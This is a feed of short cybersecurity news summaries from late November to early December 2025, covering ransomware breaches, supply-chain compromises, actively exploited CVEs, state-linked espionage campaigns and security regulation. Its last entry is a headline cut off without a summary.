A sophisticated vishing (voice phishing) campaign is abusing trusted enterprise tools to deploy stealthy malware. Attackers impersonate IT support staff on Microsoft Teams, convincing users to initiate a Windows Quick Assist session. Once they have remote access, the attackers direct the user to a malicious site to download a loader. This loader then fetches an encrypted payload and executes it directly in memory using .NET reflection, a fileless technique designed to evade traditional antivirus and endpoint detection solutions. The campaign highlights the increasing trend of blending social engineering with the abuse of legitimate software.

Dec 9, 20255 min read

IBM Rolls Out Critical Patches for AIX, Cloud Pak, and Other Enterprise Software

IBM has released a wave of security updates addressing vulnerabilities in numerous enterprise products, prompting an advisory from the Canadian Centre for Cyber Security. The bulletins, published between December 1 and December 7, 2025, include critical patches for IBM AIX, VIOS, Aspera Shares, Business Automation Workflow, and Cloud Pak System, among others. Administrators are strongly urged to review the advisories and apply the necessary updates promptly to protect their infrastructure from potential exploitation.

Dec 9, 20254 min read

Race for Secure Digital Identity Heats Up with New Platforms from IBM and Turing Space

The digital identity space is seeing rapid innovation as IBM launches "Verify Digital Credentials," a new platform for issuing and authenticating secure digital documents like licenses and academic records. Built on open standards, it aims to reduce breach risk by decentralizing data storage. Concurrently, decentralized identity provider Turing Space is partnering with the IOTA blockchain to enhance its own verification offering, aiming to lower costs for enterprise-scale deployment. These moves highlight an industry-wide push towards verifiable credentials as a foundational defense against the growing threat of AI-powered deepfakes and identity fraud.

Dec 9, 20254 min read

Supply Chain Attack: Marquis Software Breach Hits 74 Banks, Akira Ransomware Suspected

Marquis Software Solutions, a U.S.-based financial software provider, has suffered a major data breach, compromising the sensitive information of over 400,000 customers across 74 client banks and credit unions. This significant supply chain attack is suspected to be the work of the Akira ransomware gang. According to investigators, the threat actors likely gained initial access by exploiting vulnerabilities in SonicWall firewall devices on Marquis's network. This incident highlights the cascading risk in the financial sector, where a compromise at a single software vendor can have widespread consequences for numerous downstream institutions and their customers.

Dec 8, 20255 min read

Cl0p Implicated in Oracle Zero-Day Attacks, Breaching UPenn and University of Phoenix

The University of Pennsylvania and the University of Phoenix have both reported data breaches resulting from the exploitation of zero-day vulnerabilities in their Oracle E-Business Suite servers. The attacks have compromised the personal information of at least 1,488 individuals at UPenn and a much larger, unspecified number of students, alumni, and staff at the University of Phoenix. Security researchers suspect the notorious Cl0p ransomware gang is behind the campaign, continuing their pattern of exploiting vulnerabilities in widely used enterprise software for large-scale data theft and extortion. Both institutions are currently notifying affected individuals.

Dec 8, 20255 min read

White House Sets 2025 Deadline for Post-Quantum Crypto Readiness

The White House has issued a new Executive Order to accelerate the U.S. federal government's transition to post-quantum cryptography (PQC). The order sets a critical deadline of December 1, 2025, for several key initiatives. It directs CISA and the NSA to create and maintain a list of commercially available products that support PQC standards, guiding federal procurement. It also mandates the development of new requirements for federal agencies to support TLS 1.3, a necessary precursor for PQC integration. Additionally, NIST is tasked with updating its Secure Software Development Framework (SSDF) to include practices for developing quantum-resistant software.

Dec 8, 20255 min read

WhatsApp Worm Spreads Astaroth Banking Trojan in New Brazilian Campaign

A new malware campaign, tracked as STAC3150, is targeting banking users in Brazil by using WhatsApp Web as a distribution vector for the Astaroth banking trojan. The attack begins with a social engineering lure sent via WhatsApp, which persuades the victim to download a malicious ZIP archive. The archive contains a VBS or HTA file that, when executed, initiates a multi-stage infection process to deploy the Astaroth trojan. Astaroth is a well-known information stealer designed to capture banking credentials and other sensitive data. This campaign highlights the increasing use of popular messaging platforms for malware delivery.

Dec 8, 20254 min read

SharePoint Flaw Chain Exploited to Deploy Warlock Ransomware

A new attack campaign attributed to the threat actor Storm-2603 is exploiting a chain of Microsoft SharePoint vulnerabilities (CVE-2025-49706, CVE-2025-49704) for initial access. Post-exploitation, the attackers deploy Velociraptor, a legitimate digital forensics and incident response (DFIR) tool, for reconnaissance and persistence. By abusing a trusted tool, the attackers blend in with normal administrative activity, evading detection. In several confirmed incidents, this attack chain culminates in the deployment of the Warlock ransomware. This 'living-off-the-land' technique highlights a sophisticated approach to facilitating ransomware attacks.

Dec 8, 20255 min read

Supply Chain Breach at Vendor Marquis Exposes Data From Dozens of US Banks

A ransomware attack on Marquis Software Solutions, a marketing and data analytics vendor for the financial industry, has resulted in a significant supply chain data breach affecting dozens of U.S. banks and credit unions. Marquis began notifying its clients on November 26, 2025, about the incident, which was first detected in August. The breach exposed highly sensitive customer information, including names, Social Security numbers, taxpayer IDs, and financial account details, that the financial institutions had entrusted to the vendor. While the banks' internal systems were not compromised, the incident highlights the profound risks associated with third-party vendors. At least 42,000 individuals in Maine alone have been affected, and Marquis is offering credit monitoring services to impacted customers.

Dec 8, 20256 min read

Malicious Go Packages Impersonating Google UUID Library Steal Data

A sophisticated and long-running supply chain attack targeting Go developers has been discovered, active since at least May 2021. The attack involves two malicious packages, `github.com/bpoorman/uuid` and `github.com/bpoorman/uid`, which impersonate a popular Google UUID library using a typosquatting technique. The counterfeit packages are fully functional to avoid suspicion but contain a hidden backdoor. A specific function, `Valid`, is weaponized to secretly encrypt and exfiltrate any data passed to it, such as user IDs or session tokens, to an external paste site. This stealthy method allows the attacker, 'bpoorman', to siphon sensitive information from compromised applications.

Dec 7, 20254 min read

Mexico's Maguen Group Launches Global Cybersecurity Brand 'Fortem'

Maguen Group, a leading private security firm based in Mexico, has officially launched Fortem Cybersecurity, its new global cybersecurity brand, on December 7, 2025. The new entity is an evolution of the company's existing cybersecurity arm, MT Cyber, which it acquired in 2019. With Fortem, Maguen Group aims to 'democratize cybersecurity' by offering enterprise-level protection to companies of all sizes. The launch marks a strategic push for global expansion, leveraging its existing presence in Mexico, Ecuador, and Germany, with the United States targeted as the next major market.

Dec 7, 20252 min read

Malicious Rust Package 'evm-units' Targets Web3 Developers

A malicious software package named 'evm-units' has been discovered and removed from Rust's official crates.io registry. The package, downloaded over 7,200 times, targeted Web3 developers by impersonating a legitimate utility for the Ethereum Virtual Machine (EVM). While appearing functional, the crate contained a stealthy, multi-stage loader designed to download and execute operating system-specific malware. The malware included code to specifically evade 360 Total Security, a popular antivirus in China, suggesting the threat actor's focus was on stealing cryptocurrency from developers, likely in the Asian market. A second package, 'uniswap-utils', was also removed for depending on the malicious crate.

Dec 7, 20254 min read

Wireshark Vulnerabilities Create Denial-of-Service Risk for Security Teams

France's national cybersecurity agency, CERT-FR, has issued a security advisory for two critical vulnerabilities in Wireshark, the world's most popular network protocol analyzer. The flaws, identified as CVE-2025-13945 and CVE-2025-13946, can be exploited by a remote attacker to cause a denial-of-service (DoS) condition. This poses a significant risk to security operations, as an attacker could crash the tool during a live incident investigation, effectively blinding security analysts. Users are urged to update to the patched versions (4.4.12 and 4.6.2) to mitigate the risk.

Dec 7, 20253 min read

Washington Post Breached by Clop Ransomware via Oracle Flaws

The Washington Post has officially confirmed it was a victim of a large-scale cyberattack orchestrated by the Clop ransomware group. The threat actors exploited vulnerabilities in Oracle's E-Business Suite, compromising over 100 organizations globally. The campaign involves data exfiltration followed by aggressive extortion tactics, with Clop publicly naming victims on its dark web leak site to pressure them into paying ransoms reportedly as high as $50 million. This incident underscores the significant risk posed by vulnerabilities in widely used enterprise software and the sophisticated, multi-faceted extortion methods employed by modern ransomware gangs.

Dec 7, 20256 min read

CISA: Commercial Spyware Hijacking Signal & WhatsApp via Zero-Clicks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a critical alert regarding active campaigns using commercial spyware to compromise the Signal and WhatsApp accounts of high-value targets. Attackers are employing sophisticated methods including social engineering, malicious QR codes for device linking, and zero-click exploits that require no user interaction. The campaigns are reportedly targeting current and former government officials, military personnel, and civil society organizations across the U.S., Europe, and the Middle East. CISA warns that initial access to messaging apps is often used as a beachhead to deploy further malware and achieve full device compromise.

Dec 7, 20255 min read

Global Coalition Targets 'Bulletproof' Hosting Services Fueling Cybercrime

An international coalition of cybersecurity agencies, including the NSA, CISA, and the FBI, has launched a coordinated effort to combat 'bulletproof' hosting (BPH) providers. These services knowingly lease infrastructure to cybercriminals for activities like ransomware and phishing. A new joint advisory urges Internet Service Providers (ISPs) and network defenders to adopt strategies to identify, block, and report these malicious hosts. The guidance focuses on a nuanced approach, including creating high-confidence blocklists and improving 'know your customer' processes, to disrupt the foundational infrastructure of cybercrime.

Dec 6, 20254 min read

Cloudflare Outage Hits 28% of Global Traffic After Faulty React2Shell Patch

Cloudflare, a leading internet infrastructure provider, experienced a 25-minute global outage on December 5, 2025, that impacted approximately 28% of its HTTP traffic and made numerous popular websites inaccessible. The company quickly confirmed the disruption was not a cyberattack but was self-inflicted, caused by a faulty emergency change to its Web Application Firewall (WAF). The problematic update was deployed to provide mitigation against the critical React2Shell (CVE-2025-55182) vulnerability. The incident highlights the inherent risks of rapid, large-scale deployments, even when intended to improve security, and raises questions about change management processes for critical infrastructure.

Dec 6, 20254 min read

AI Infrastructure at Risk: MCP Servers Emerge as New Supply Chain Threat

A new security advisory warns that Model Context Protocol (MCP) servers represent a significant and growing supply chain risk for organizations building AI-powered applications. These servers act as highly privileged automation engines, often possessing trusted access to sensitive enterprise resources like code repositories, email systems, and internal APIs. The warning follows the analysis of a critical vulnerability at hosting service Smithery.ai, where a single path traversal flaw could have allowed an attacker to gain administrative control over 3,000 hosted MCP servers. This and other incidents demonstrate that MCP servers are high-value targets that can be exploited to compromise entire AI software supply chains.

Dec 6, 20255 min read

Iran Bans Officials From Using All Internet-Connected Devices Over Espionage Fears

In a drastic measure to combat espionage, Iran's Cybersecurity Command has banned all government officials and their security staff from using any device connected to public communication networks. The directive, reported on December 5, 2025, includes smartphones, laptops, and smartwatches. The move is a direct response to fears of hacking and mobile tracking being used for targeted assassinations, referencing past attacks on nuclear scientists and recent pager and walkie-talkie attacks against Hezbollah. The policy highlights a security philosophy of complete network isolation for key personnel over reliance on defensive technology.

Dec 6, 20254 min read

Massive Supply Chain Attack Hits 200+ Companies via Salesforce App; Hacker Group Claims Breach

A hacking collective known as Scattered Lapsus$ Hunters has claimed responsibility for a large-scale supply chain attack that compromised the Salesforce data of over 200 organizations. The attack did not exploit a vulnerability in Salesforce itself, but rather abused OAuth tokens from the Gainsight customer-success application. The attackers gained unauthorized access to customer data, prompting Salesforce to revoke all tokens for the app. The group has named high-profile victims like Atlassian, Docusign, and Verizon, highlighting the significant risks of SaaS-to-SaaS integrations.

Dec 5, 20256 min read

New "Benzona" Ransomware Strain Discovered in the Wild

Security researchers at CYFIRMA have discovered a new ransomware strain named "Benzona." The malware encrypts files on Windows, macOS, and Linux systems, appending a ".benzona" extension and dropping a ransom note titled "RECOVERY_INFO.txt". Victims are instructed to use the TOR browser to access a chat portal for recovery negotiations. The threat actors behind Benzona are believed to use a variety of initial access vectors, including social engineering, botnets, and exploitation of software vulnerabilities.

Dec 5, 20254 min read

Critical 7-Zip RCE Vulnerability Now Under Active Exploitation

A critical remote code execution (RCE) vulnerability in the popular 7-Zip file archiver, tracked as CVE-2025-11001, is now being actively exploited in the wild. The path traversal flaw, which affects versions prior to 25.0.0, can be triggered when a user extracts a specially crafted malicious archive. This allows an attacker to write files to arbitrary locations and execute code. NHS England has issued an advisory confirming active exploitation, urging all organizations to update their installations immediately.

Dec 5, 20254 min read

CISA Exposes 'BRICKSTORM' Backdoor Used by Chinese State Actors to Infiltrate US Government

The US Cybersecurity and Infrastructure Security Agency (CISA), NSA, and Canadian Centre for Cyber Security have jointly exposed a sophisticated backdoor named 'BRICKSTORM'. According to the December 4, 2025 advisory, People's Republic of China (PRC) state-sponsored actors are using this malware to target government and IT sector organizations. BRICKSTORM is designed for stealth and long-term persistence in both VMware vSphere and Windows environments. It employs multi-layered encrypted communications, including DNS-over-HTTPS (DoH), to hide its C2 traffic. The advisory details an attack chain where actors used a web shell for initial access, moved laterally via RDP, and ultimately deployed BRICKSTORM on a VMware vCenter server to compromise domain controllers. Agencies are urged to hunt for this threat immediately.

Dec 4, 20256 min read

Android Zero-Days Under Active Attack, CISA Adds to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added two high-severity Android zero-day vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, indicating they are under active attack. The vulnerabilities, CVE-2025-48633 (Information Disclosure) and CVE-2025-48572 (Elevation of Privilege), affect the core Android Framework on versions 13, 14, 15, and 16. Google's December 2025 security bulletin confirmed the flaws may be subject to 'limited, targeted exploitation,' a pattern often associated with sophisticated spyware campaigns. Federal agencies are now mandated to patch these vulnerabilities, and all Android users are urged to apply the latest security updates as soon as possible to protect against potential device compromise.

Dec 4, 20254 min read

Ransomware Payments Exceed $2.1 Billion Since 2022, FinCEN Reports

A new Financial Trend Analysis from the U.S. Treasury's Financial Crimes Enforcement Network (FinCEN), released December 4, 2025, reveals that financial institutions reported over $2.1 billion in ransomware-related payments between January 2022 and December 2024. The data, derived from Bank Secrecy Act (BSA) filings, shows a peak in 2023 with $1.1 billion in payments. The report identifies ALPHV/BlackCat, LockBit, and Akira as some of the most prevalent variants, with the manufacturing and financial services sectors being the most frequent victims. The analysis underscores the critical role of BSA reporting in tracking cybercrime trends and informing law enforcement actions.

Dec 4, 20254 min read

Freedom Mobile Data Breach Exposes Customer PII via Compromised Subcontractor

Canadian telecommunications provider Freedom Mobile announced on December 3, 2025, that it suffered a data breach after an unauthorized party gained access to its systems on October 23, 2025. The attacker leveraged the compromised account of a third-party subcontractor to access a customer account management platform. Exposed data includes customer names, addresses, birth dates, phone numbers, and account numbers. Freedom Mobile stated that more sensitive data like payment card information and passwords were not affected. The company is notifying a 'limited number' of affected individuals and advising them to be vigilant against phishing attacks.

Dec 4, 20254 min read

CISA KEV Alert: Actively Exploited ScadaBR Flaw Puts Industrial Control Systems at Risk

CISA has added CVE-2021-26828, a high-severity vulnerability in the OpenPLC ScadaBR industrial control system (ICS) software, to its Known Exploited Vulnerabilities (KEV) catalog as of December 3, 2025. The flaw, with a CVSS score of 8.7, is an unrestricted file upload vulnerability that allows an authenticated attacker to achieve remote code execution (RCE) by uploading a malicious JSP file. This poses a significant risk to operational technology (OT) environments where this open-source SCADA solution is deployed. Federal agencies are mandated to patch by December 24, 2025, and CISA urges all organizations in critical infrastructure sectors to prioritize remediation.

Dec 4, 20255 min read

Under Armour Sued Over Data Breach Attributed to 'Everest' Cybercrime Group

Athletic apparel giant Under Armour is the target of a new class action lawsuit following a November 2025 data breach. The suit, reported on December 4, 2025, claims the company was negligent in protecting the personal information of consumers and employees. The breach was allegedly carried out by the 'Everest' cybercriminal group, which claims to have stolen and leaked hundreds of gigabytes of data. The lawsuit asserts that Under Armour failed to implement basic cybersecurity measures like encryption and did not provide timely notification to victims, who now face a heightened risk of identity theft and fraud.

Dec 4, 20254 min read

Critical Zero-Days in PyTorch Scanner 'PickleScan' Create AI Supply Chain Risk

Security firm JFrog has disclosed three critical zero-day vulnerabilities in PickleScan, a popular open-source tool used to scan Python pickle files for malware, particularly within the PyTorch AI framework. The flaws, collectively rated with a CVSS score of 9.3, allow an attacker to craft a malicious AI model that bypasses PickleScan's security checks. When this seemingly safe model is loaded by a user, it can lead to arbitrary code execution. This discovery, announced on December 3, 2025, highlights a significant software supply chain risk for the AI/ML community, as attackers could distribute weaponized models that evade standard security scanning.

Dec 4, 20255 min read

AWS Boosts Cloud Defense with New AI-Powered Security Tools at re:Invent 2025

At its re:Invent 2025 conference, Amazon Web Services (AWS) unveiled several major additions to its security portfolio, heavily infused with artificial intelligence. Key announcements on December 3, 2025, included the preview of AWS Security Agent, a context-aware tool for proactive application security testing throughout the development lifecycle. AWS also announced the general availability of its revamped AWS Security Hub for centralized cloud security posture management (CSPM) and new attack sequence findings in Amazon GuardDuty for better threat detection in EC2 and ECS environments. These updates aim to automate and enhance security operations for organizations in the cloud.

Dec 4, 20254 min read

React2Shell: Critical 10.0 CVSS RCE Hits React & Next.js, Actively Exploited!

A critical unauthenticated remote code execution (RCE) vulnerability, dubbed 'React2Shell' and tracked as CVE-2025-55182, has been disclosed in React Server Components. With a maximum CVSS score of 10.0, the flaw affects popular frameworks like Next.js and allows attackers to take complete control of vulnerable servers. Security researchers have already observed active exploitation in the wild, with attackers attempting to harvest cloud credentials and deploy cryptocurrency miners. Major cloud providers have issued WAF rules as a temporary mitigation, but immediate patching is essential.

Dec 3, 20256 min read

ValleyRAT Malware Targets Job Seekers Using Foxit PDF Reader Disguise

A new malware campaign is distributing the ValleyRAT remote access trojan by preying on job seekers. Attackers send emails with weaponized executables disguised as HR documents, using the Foxit PDF Reader icon as a lure. The attack leverages a legitimate, renamed Foxit executable to perform a DLL side-loading attack, which silently loads the malware while displaying a decoy document to the victim. Once active, ValleyRAT provides attackers with full control over the compromised system, enabling data theft and surveillance.

Dec 3, 20255 min read

G7 Unveils New Framework for Coordinated Cyber Response in Financial Sector

The G7 Cyber Expert Group has published a new policy paper outlining non-binding principles for Collective Cyber Incident Response and Recovery (CCIRR) within the global financial sector. The framework, developed to foster greater cross-border cooperation, aims to improve information sharing, streamline crisis communication, and bolster the resilience of the international financial system against major cyber incidents. The principles are intended as a high-level guide rather than a set of regulatory requirements.

Dec 3, 20254 min read

EU Cyber Resilience Act Deadlines Loom: Vulnerability Reporting Starts 2026

The European Union is advancing the implementation of its landmark Cyber Resilience Act (CRA), which establishes mandatory cybersecurity requirements for all hardware and software products sold in the EU. With the regulation now in force, key deadlines are approaching. Manufacturers must prepare for a critical milestone in September 2026, when obligations to report actively exploited vulnerabilities to authorities within 24 hours will begin. The act aims to enforce security-by-design and ensure products remain secure throughout their lifecycle.

Dec 3, 20255 min read

Qilin Ransomware Gang Claims 7 of 11 New Victims in 24 Hours

The daily ransomware report for November 8, 2025, highlights a significant burst of activity from the Qilin ransomware group, which claimed responsibility for 7 of the 11 new victims announced in the past 24 hours. The DragonForce group was the second most active with three victims. The attacks primarily targeted the professional services and manufacturing sectors, with victims located in the United States, Canada, and the United Kingdom. This latest surge brings the total number of publicly claimed ransomware victims in 2025 to 6,364, underscoring the relentless and persistent threat that ransomware-as-a-service (RaaS) operations pose to organizations globally.

Dec 2, 20255 min read

SmartTube App Compromised: Malicious Update Pushed via Stolen Keys

A significant supply chain attack has compromised the popular ad-free YouTube client for Android TV, SmartTube. An attacker stole the developer's signing keys and distributed a malicious update containing surveillance-style malware through official channels. The malware, hidden in versions 30.43 through 30.55, collected device information and sent it to a command-and-control server. In response, Google Play Protect began automatically disabling the app on user devices. The developer has since revoked the compromised keys and released a new, clean version, which requires all users to perform a manual reinstallation to ensure their security.

Dec 2, 20255 min read

'Cryptomixer' Shut Down: Authorities Seize €25M in Bitcoin from Laundering Service

A coordinated international law enforcement action, codenamed "Operation Olympia," has successfully dismantled Cryptomixer.io, a major cryptocurrency mixing service. Led by Swiss and German authorities with significant support from Europol and Eurojust, the takedown resulted in the seizure of servers, 12 terabytes of data, and over €25 million in Bitcoin. The service, active since 2016, is believed to have laundered over €1.3 billion for a wide range of criminal groups, including ransomware gangs and the North Korean Lazarus Group, by obfuscating the trail of illicit funds.

Dec 2, 20254 min read

Iran-Linked MuddyWater APT Targets Israel with New 'MuddyViper' Backdoor

The Iranian-affiliated APT group MuddyWater has been observed in a new cyberespionage campaign targeting critical infrastructure and other key sectors in Israel and Egypt. Active from late 2024 to early 2025, the campaign leverages a previously undocumented custom C/C++ backdoor named MuddyViper. The malware is delivered via a loader called Fooder, which in some cases was disguised as the classic Snake game to deceive victims. The group, also known as Mango Sandstorm, used the backdoor for espionage, credential theft, and remote command execution, and showed operational overlap with another Iranian group, Lyceum.

Dec 2, 20256 min read

Lazarus APT's Remote IT Worker Infiltration Scheme Exposed in Real-Time

A joint investigation by security researchers has exposed the inner workings of a North Korean Lazarus Group scheme where operatives commit identity fraud to get hired as remote IT workers at Western firms. By luring the threat actors into a sophisticated honeypot environment, researchers from BCA LTD, NorthScan, and ANY.RUN were able to capture their tactics, techniques, and procedures (TTPs) in real-time. The scheme's goals are twofold: to gain persistent network access for espionage and to funnel salaries back to the Democratic People's Republic of Korea (DPRK) in violation of international sanctions.

Dec 2, 20256 min read

India Backs Down on Mandatory Pre-Installed Government "Snooping App"

Following widespread criticism from privacy advocates and significant resistance from major tech companies, the Indian government has withdrawn a controversial directive that would have required smartphone makers like Apple and Samsung to pre-install a non-deletable, state-owned security app. The app, named "Sanchar Saathi," was labeled a potential "snooping app" by critics, who raised concerns that it could be used as a tool for mass surveillance, violating citizens' right to privacy. The swift reversal marks a notable event in the ongoing global debate over digital privacy and government authority.

Dec 2, 20254 min read

AI Cybersecurity Firm Tenex Expands to EMEA with New Funding

AI-native cybersecurity firm Tenex announced its expansion into the Europe, Middle East, and Africa (EMEA) region on December 2, 2025. The strategic move is supported by a new Series A investment from the global investment firm DTCP. Tenex, which offers an AI-driven managed detection and response (MDR) service, has seen rapid growth since its founding in January 2025 and plans to establish an international headquarters in Europe in 2026 to capitalize on the region's demand and talent pool.

Dec 2, 20252 min read

CrowdStrike Named AWS Global Security and Marketplace Partner of the Year

At the AWS re:Invent 2025 conference, cybersecurity leader CrowdStrike was named both the Amazon Web Services (AWS) 2025 Global Security Partner of the Year and the Global Marketplace Partner of the Year. This dual recognition follows a landmark achievement for CrowdStrike, which became the first cloud-native independent software vendor (ISV) to surpass $1 billion in sales through the AWS Marketplace within a single calendar year, underscoring the strength of its cloud security offerings and its partnership with AWS.

Dec 2, 20253 min read

Coupang Breach Exposes 33.7 Million Users in South Korea

South Korean e-commerce leader Coupang has admitted to a significant data breach exposing the personal information of 33.7 million customers, impacting over half of South Korea's population. The breach, which began in June 2025 and was detected in mid-November, stemmed from authentication vulnerabilities and the potential misuse of an ex-employee's still-active authentication key. Exposed data includes names, emails, phone numbers, and addresses. Coupang has reset user passwords and is working with authorities, including the Korea Internet & Security Agency (KISA), on the investigation.

Dec 1, 20256 min read

Urgent Android Update: Google Patches 107 Flaws, Two Zero-Days Under Active Attack

Google has issued its December 2025 Android security bulletin, patching a total of 107 vulnerabilities. The update is critical, as it addresses two high-severity zero-days, CVE-2025-48633 (Information Disclosure) and CVE-2025-48572 (Elevation of Privilege), which are under limited, targeted exploitation in the wild. The patch also fixes a critical remote denial-of-service (DoS) flaw, CVE-2025-48631, in the Android Framework. The update covers vulnerabilities in components from Qualcomm, Arm, MediaTek, and others, affecting Android versions 13 through 16. Users are urged to install the update as soon as it becomes available for their devices.

Dec 1, 20255 min read

APTs Exploit WinRAR Zero-Day to Target Industrial Sector in Q3 2025

Kaspersky's Q3 2025 threat report for industrial organizations highlights extensive exploitation of a WinRAR zero-day vulnerability, CVE-2025-8088. The flaw was used by multiple threat actors, including the RomCom cybercrime group and the Paper Werewolf (GOFFEE) APT, to deploy backdoors like SnipBot and the Mythic agent against industrial targets. The report also details other significant cyber-espionage campaigns, such as PhantomCore's attacks on Russian critical infrastructure and Cavalry Werewolf's phishing operations against energy and manufacturing sectors, underscoring the persistent threat to industrial control systems (ICS).

Dec 1, 20256 min read

FTC Slams EdTech Firm Illuminate Education Over Breach of 10M Students' Data

The U.S. Federal Trade Commission (FTC) has taken enforcement action against education technology provider Illuminate Education for a 2021 data breach that exposed the personal and health information of 10.1 million students. The FTC alleged the company failed to implement reasonable security measures, citing the attacker's use of credentials from an employee who had left 3.5 years prior. Under the settlement, Illuminate must implement a comprehensive security program, delete non-essential student data, and undergo third-party assessments, highlighting severe consequences for failing to protect children's data.

Dec 1, 20255 min read

Warning: Public PoC Exploit Released for Critical Zero-Click Outlook RCE Flaw

A proof-of-concept (PoC) exploit has been publicly released for CVE-2024-21413, a critical zero-click remote code execution (RCE) vulnerability in Microsoft Outlook nicknamed 'MonikerLink'. The flaw allows an attacker to execute arbitrary code on a victim's machine simply by sending a malicious email, with no user interaction required. The release of the PoC dramatically increases the risk of widespread exploitation. All organizations using affected versions of Outlook are urged to apply the security patches released by Microsoft immediately to prevent compromise.

Dec 1, 20255 min read

Mystery Breach: Major Tech Firm Exposes Millions of Users' Data

A major, but currently unnamed, technology company has reportedly suffered a massive data breach, exposing the personal data of millions of users worldwide. The breach was detected on November 24, 2025, after unusual activity was observed on the company's servers, stemming from an unspecified vulnerability. The company has reportedly shut down the compromised servers, notified authorities, and begun alerting users. This incident is being described as one of the largest in recent years, placing millions at risk of identity theft and phishing attacks.

Dec 1, 20255 min read

US Probes Bitcoin Mining Giant Bitmain for National Security Threats

The U.S. Department of Homeland Security is reportedly conducting a probe, codenamed 'Operation Red Sunset,' into Chinese bitcoin mining hardware manufacturer Bitmain. According to reports from November 29, 2025, the investigation centers on fears that Bitmain's mining devices could contain hidden backdoors for espionage or capabilities to sabotage the U.S. electrical grid. The probe allegedly involves physically inspecting imported hardware at U.S. ports for kill switches or remote access features. Bitmain has denied the allegations, but the investigation highlights growing national security concerns surrounding foreign-made hardware in critical infrastructure sectors.

Nov 30, 20255 min read

Yearn Finance Hit by $9M 'Infinite Mint' Exploit

On November 30, 2025, the DeFi protocol Yearn Finance was exploited for approximately $9 million. The attacker leveraged a flaw in a legacy yETH stableswap smart contract, using a deposit of just 16 wei (a fraction of a cent) to mint a massive 235 septillion yETH tokens. The vulnerability stemmed from the contract's failure to clear cached storage variables after liquidity was fully drained. By manipulating these phantom balances, the attacker triggered an 'infinite mint' condition, subsequently draining the pool's assets into a Balancer pool. Around $3 million was quickly laundered through the Tornado Cash mixer.

Nov 30, 20255 min read

Amazon Data Center Blueprints Leaked in Breach of Steel Contractor

A significant data breach at Cooper Steel Fabricators, a major U.S. structural steel contractor, was reported on November 30, 2025. A threat actor is selling a 330 GB database, claiming it is a 'complete mirror' of the company's FTP server. The asking price is $28,500. The leaked data allegedly contains highly sensitive intellectual property, including detailed blueprints and structural models for an Amazon data center in Ohio and a sorting facility in Massachusetts. Blueprints for Walmart distribution centers are also included, highlighting the severe supply chain risks that can expose the critical infrastructure plans of major corporations.

Nov 30, 20255 min read

Gaming Giant Netmarble Breached, 6.1 Million Users' Data Exposed

South Korean gaming company Netmarble confirmed on November 30, 2025, that it suffered a data breach on November 22, exposing the personal information of 6.11 million members of its PC game portal. The compromised data includes names, birthdates, and encrypted passwords. The leak also affected 66,000 PC cafe owners and 17,000 current and former employees. Netmarble came under fire for waiting nearly 72 hours to report the incident to the Korea Internet & Security Agency (KISA), raising concerns about its incident response transparency.

Nov 30, 20255 min read

CodeRED Alert System Hit by Ransomware, Wall Street Scrambles After Vendor Hack

A weekend news roundup from November 29, 2025, covered several major cyber incidents. The nationwide CodeRED emergency alert system, provided by OnSolve, was hit by an INC Ransom attack, disrupting a critical public safety service. In finance, Wall Street banks were assessing the fallout from a breach at a third-party real estate data firm, exposing ongoing supply chain risks. Additionally, the pro-Ukrainian hacktivist group Ukrainian Cyber Alliance claimed responsibility for a destructive attack on Donbas Post, the Russian-run postal service in occupied Ukraine, reportedly wiping over a thousand systems.

Nov 30, 20255 min read

Comcast Fined $1.5M by FCC for Vendor's Data Breach

Comcast has agreed to a $1.5 million settlement with the Federal Communications Commission (FCC) following a 2024 data breach at a former vendor. The breach occurred at Financial Business and Consumer Solutions (FBCS), a debt collection agency, and exposed the personal information of nearly 238,000 Comcast customers, including names, addresses, and Social Security numbers. FBCS filed for bankruptcy before disclosing the breach, leaving Comcast to face the regulatory fallout. As part of the settlement, Comcast will implement a stricter vendor security compliance plan, highlighting the growing regulatory expectation for companies to secure their entire supply chain.

Nov 30, 20255 min read

Global Infrastructure Breach Alert Confirmed as False Alarm

Initial reports on November 30, 2025, of a major security breach impacting global infrastructure were officially confirmed to be a false alarm. The panic was triggered when automated monitoring tools misinterpreted routine, benign system tests as a sophisticated cyberattack, leading to a cascade of incorrect alerts. While no data was stolen and no systems were compromised, the incident has exposed potential weaknesses in cyber-alerting systems and their ability to differentiate between normal administrative actions and genuine threats. The event has prompted calls for improving alert validation processes to maintain public trust.

Nov 30, 20254 min read

Asahi Confirms Qilin Ransomware Breach Exposed Data of Nearly 2 Million

Japanese beverage giant Asahi Group Holdings has confirmed a September 2025 ransomware attack by the Qilin group resulted in a massive data breach affecting 1.914 million individuals. The breach exposed the personal information of customers, employees, and business contacts, leading to significant operational disruptions, including production halts and product shortages. The attackers gained initial access through compromised network equipment and moved laterally to deploy ransomware across Asahi's domestic data centers. While no financial data was stolen, the exposed PII includes names, addresses, phone numbers, and dates of birth.

Nov 29, 20256 min read

Qilin's "Korean Leaks" Hits 28 Financial Firms via MSP Supply Chain Attack

The Qilin ransomware group has executed a devastating supply-chain attack, dubbed "Korean Leaks," by breaching GJTec, a South Korean managed service provider (MSP). This single point of failure allowed the attackers to compromise at least 28 of the MSP's downstream financial services clients. The campaign, which ran in waves from September to October 2025, resulted in the exfiltration of over 2TB of data. Researchers from Bitdefender have noted potential links to the North Korean state-affiliated group Moonstone Sleet, suggesting a hybrid operation blending financial extortion with geopolitical motives.

Nov 29, 20256 min read

TryHackMe Apologizes for All-Male Panel After Community Backlash

Cybersecurity training platform TryHackMe issued a public apology on November 28, 2025, after announcing an all-male list of 18 industry helpers for its popular "Advent of Cyber" event. The omission sparked significant backlash from the cybersecurity community regarding the lack of gender diversity and representation. The company acknowledged the mistake was unintentional, stating several female creators had been invited but were unavailable. TryHackMe is now actively working with community members to recruit and onboard women to the panel before the event's launch.

Nov 29, 20253 min read

Pakistan-linked APT36 Targets Indian Government with New Linux Malware

The Pakistan-based threat group APT36, also known as Transparent Tribe, is conducting an active cyber-espionage campaign against Indian government entities. A CYFIRMA report published on November 29, 2025, details the group's use of a new Python-based malware compiled for Linux systems (ELF format). This development signifies an expansion of APT36's toolkit to target non-Windows environments within sensitive Indian government and strategic sector networks, continuing the group's long-standing focus on intelligence gathering against India.

Nov 29, 20255 min read

North Korea's Cybercrime is Statecraft, Report Warns

